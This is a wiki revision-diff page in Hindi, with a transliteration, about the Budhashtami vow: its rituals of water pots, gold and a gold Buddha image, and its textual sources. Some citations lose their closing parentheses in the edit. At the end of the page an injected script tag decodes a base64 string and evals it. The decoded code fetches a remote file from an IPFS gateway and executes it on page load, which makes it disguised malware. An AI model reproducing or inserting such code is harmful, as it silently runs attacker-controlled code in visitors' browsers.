Difference between revisions of "बुधाष्टमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - ")</ref" to "</ref")
 
Line 4: Line 4:
 
*आठ अष्टमियों पर क्रम से आठ जलपूर्ण घट रखे जाते हैं, जिनमें एक स्वर्ण खण्ड रख दिया जाता है।  
 
*आठ अष्टमियों पर क्रम से आठ जलपूर्ण घट रखे जाते हैं, जिनमें एक स्वर्ण खण्ड रख दिया जाता है।  
 
*विभिन्न प्रकार की खाद्य सामग्रियों के साथ में दिन कर दिये जाते हैं।  
 
*विभिन्न प्रकार की खाद्य सामग्रियों के साथ में दिन कर दिये जाते हैं।  
*अन्त में [[बुद्ध]] की एक स्वर्ण प्रतिमा भी दान के रूप में दी जाती है।<ref>हेमाद्रि (व्रत0 1, 866-873, भविष्योत्तरपुराण 54|159 से उद्धरण)</ref>
+
*अन्त में [[बुद्ध]] की एक स्वर्ण प्रतिमा भी दान के रूप में दी जाती है।<ref>हेमाद्रि (व्रत0 1, 866-873, भविष्योत्तरपुराण 54|159 से उद्धरण</ref>
 
*प्रत्येक अष्टमी पर ऐल पुरूरवा तथा मिथि और उसकी कन्या उर्मिला की गाथाएँ सनी जाती हैं।  
 
*प्रत्येक अष्टमी पर ऐल पुरूरवा तथा मिथि और उसकी कन्या उर्मिला की गाथाएँ सनी जाती हैं।  
*वर्षक्रियाकौमुदी<ref>वर्षक्रियाकौमुदी (39-40)</ref> ने इस व्रत पर राजमार्तण्ड के तीन श्लोक उद्धृत किये हैं, जो व्रततत्त्व<ref>व्रततत्त्व (पृ0 151)</ref> में रखे गये हैं।  
+
*वर्षक्रियाकौमुदी<ref>वर्षक्रियाकौमुदी (39-40</ref> ने इस व्रत पर राजमार्तण्ड के तीन श्लोक उद्धृत किये हैं, जो व्रततत्त्व<ref>व्रततत्त्व (पृ0 151</ref> में रखे गये हैं।  
*व्रतराज<ref>व्रतराज (256-265)</ref> ने इस व्रत का एवं इसके [[उद्यापन]] का उल्लेख किया है।  
+
*व्रतराज<ref>व्रतराज (256-265</ref> ने इस व्रत का एवं इसके [[उद्यापन]] का उल्लेख किया है।  
 
 
 
 
  

Latest revision as of 12:54, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • jab shukl ashtami ko budhavar p data hai to vrat ka arambh hota hai.
  • yah vrat ekabhakt vidhi se kiya jata hai.
  • ath ashtamiyoan par kram se ath jalapoorn ghat rakhe jate haian, jinamean ek svarn khand rakh diya jata hai.
  • vibhinn prakar ki khady samagriyoan ke sath mean din kar diye jate haian.
  • ant mean buddh ki ek svarn pratima bhi dan ke roop mean di jati hai.[1]
  • pratyek ashtami par ail puroorava tatha mithi aur usaki kanya urmila ki gathaean sani jati haian.
  • varshakriyakaumudi[2] ne is vrat par rajamartand ke tin shlok uddhrit kiye haian, jo vratatattv[3] mean rakhe gaye haian.
  • vrataraj[4] ne is vrat ka evan isake udyapan ka ullekh kiya hai.

 


tika tippani aur sandarbh

  1. hemadri (vrat0 1, 866-873, bhavishyottarapuran 54|159 se uddharan
  2. varshakriyakaumudi (39-40
  3. vratatattv (pri0 151
  4. vrataraj (256-265

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>